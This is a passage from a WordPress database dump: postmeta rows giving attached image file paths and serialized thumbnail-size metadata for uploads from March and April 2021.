mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167393647_3272977089472287_8610582427784742156_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27926, 11411, '_wp_attached_file', '2021/03/168478766_3272977019472294_4940907395674672303_n.png'),
(27927, 11411, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/168478766_3272977019472294_4940907395674672303_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"168478766_3272977019472294_4940907395674672303_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"168478766_3272977019472294_4940907395674672303_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"168478766_3272977019472294_4940907395674672303_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"168478766_3272977019472294_4940907395674672303_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"168478766_3272977019472294_4940907395674672303_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27928, 11412, '_wp_attached_file', '2021/03/167237172_3272976956138967_4711499436429294372_n.png'),
(27929, 11412, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167237172_3272976956138967_4711499436429294372_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167237172_3272976956138967_4711499436429294372_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167237172_3272976956138967_4711499436429294372_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167237172_3272976956138967_4711499436429294372_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167237172_3272976956138967_4711499436429294372_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167237172_3272976956138967_4711499436429294372_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27930, 11413, '_wp_attached_file', '2021/03/167306540_3272976909472305_1322803133630481287_n.png'),
(27931, 11413, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167306540_3272976909472305_1322803133630481287_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167306540_3272976909472305_1322803133630481287_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167306540_3272976909472305_1322803133630481287_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167306540_3272976909472305_1322803133630481287_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167306540_3272976909472305_1322803133630481287_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167306540_3272976909472305_1322803133630481287_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27932, 11414, '_wp_attached_file', '2021/03/166941216_3272976826138980_1384578072828446662_n.png'),
(27933, 11414, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/166941216_3272976826138980_1384578072828446662_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"166941216_3272976826138980_1384578072828446662_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"166941216_3272976826138980_1384578072828446662_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"166941216_3272976826138980_1384578072828446662_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"166941216_3272976826138980_1384578072828446662_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"166941216_3272976826138980_1384578072828446662_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27934, 11415, '_wp_attached_file', '2021/03/167334432_3272976719472324_7679992078822256581_n.png'),
(27935, 11415, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167334432_3272976719472324_7679992078822256581_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167334432_3272976719472324_7679992078822256581_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167334432_3272976719472324_7679992078822256581_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167334432_3272976719472324_7679992078822256581_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167334432_3272976719472324_7679992078822256581_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167334432_3272976719472324_7679992078822256581_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27936, 11416, '_wp_attached_file', '2021/03/168064526_3272976702805659_7894920919087478944_n.png'),
(27937, 11416, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/168064526_3272976702805659_7894920919087478944_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"168064526_3272976702805659_7894920919087478944_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"168064526_3272976702805659_7894920919087478944_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"168064526_3272976702805659_7894920919087478944_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"168064526_3272976702805659_7894920919087478944_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"168064526_3272976702805659_7894920919087478944_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27938, 11417, '_wp_attached_file', '2021/03/167588495_3272976692805660_5584819701293657525_n.png'),
(27939, 11417, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167588495_3272976692805660_5584819701293657525_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167588495_3272976692805660_5584819701293657525_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167588495_3272976692805660_5584819701293657525_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167588495_3272976692805660_5584819701293657525_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167588495_3272976692805660_5584819701293657525_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167588495_3272976692805660_5584819701293657525_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27940, 11418, '_wp_attached_file', '2021/03/167442277_3272976609472335_3438725887344983344_n.png'),
(27941, 11418, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167442277_3272976609472335_3438725887344983344_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167442277_3272976609472335_3438725887344983344_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167442277_3272976609472335_3438725887344983344_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167442277_3272976609472335_3438725887344983344_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167442277_3272976609472335_3438725887344983344_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167442277_3272976609472335_3438725887344983344_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27942, 11419, '_wp_attached_file', '2021/03/167787572_3272976592805670_8715237387495976564_n.png'),
(27943, 11419, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167787572_3272976592805670_8715237387495976564_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167787572_3272976592805670_8715237387495976564_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167787572_3272976592805670_8715237387495976564_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167787572_3272976592805670_8715237387495976564_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167787572_3272976592805670_8715237387495976564_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167787572_3272976592805670_8715237387495976564_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27944, 11420, '_wp_attached_file', '2021/03/167675557_3272975756139087_6169818708847278962_n.png'),
(27945, 11420, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167675557_3272975756139087_6169818708847278962_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167675557_3272975756139087_6169818708847278962_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167675557_3272975756139087_6169818708847278962_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167675557_3272975756139087_6169818708847278962_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167675557_3272975756139087_6169818708847278962_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167675557_3272975756139087_6169818708847278962_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27946, 11421, '_wp_attached_file', '2021/03/165159675_3272975546139108_3748204380611853507_n.png'),
(27947, 11421, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/165159675_3272975546139108_3748204380611853507_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"165159675_3272975546139108_3748204380611853507_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"165159675_3272975546139108_3748204380611853507_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"165159675_3272975546139108_3748204380611853507_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"165159675_3272975546139108_3748204380611853507_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"165159675_3272975546139108_3748204380611853507_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27948, 11422, '_wp_attached_file', '2021/03/167219550_3272975439472452_8760813617777973182_n.png'),
(27949, 11422, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167219550_3272975439472452_8760813617777973182_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167219550_3272975439472452_8760813617777973182_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167219550_3272975439472452_8760813617777973182_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167219550_3272975439472452_8760813617777973182_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167219550_3272975439472452_8760813617777973182_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167219550_3272975439472452_8760813617777973182_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27950, 11423, '_wp_attached_file', '2021/03/167907792_3272975292805800_6987235949452963415_n.png'),
(27951, 11423, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1448;s:6:\"height\";i:2048;s:4:\"file\";s:60:\"2021/03/167907792_3272975292805800_6987235949452963415_n.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:60:\"167907792_3272975292805800_6987235949452963415_n-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:60:\"167907792_3272975292805800_6987235949452963415_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:61:\"167907792_3272975292805800_6987235949452963415_n-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:61:\"167907792_3272975292805800_6987235949452963415_n-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:60:\"167907792_3272975292805800_6987235949452963415_n-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27954, 11425, '_edit_lock', '1617783475:14'),
(27955, 11425, '_edit_last', '14'),
(27956, 11426, '_wp_attached_file', '2021/04/07046434.jpg'),
(27957, 11426, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046434.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046434-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046434-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046434-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046434-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046434-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27958, 11427, '_wp_attached_file', '2021/04/07046433.jpg'),
(27959, 11427, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2021/04/07046433.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"07046433-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"07046433-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"07046433-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"07046433-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"07046433-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(27960, 11428, '_wp_attached_file', '2021/04/07046432.jpg'),
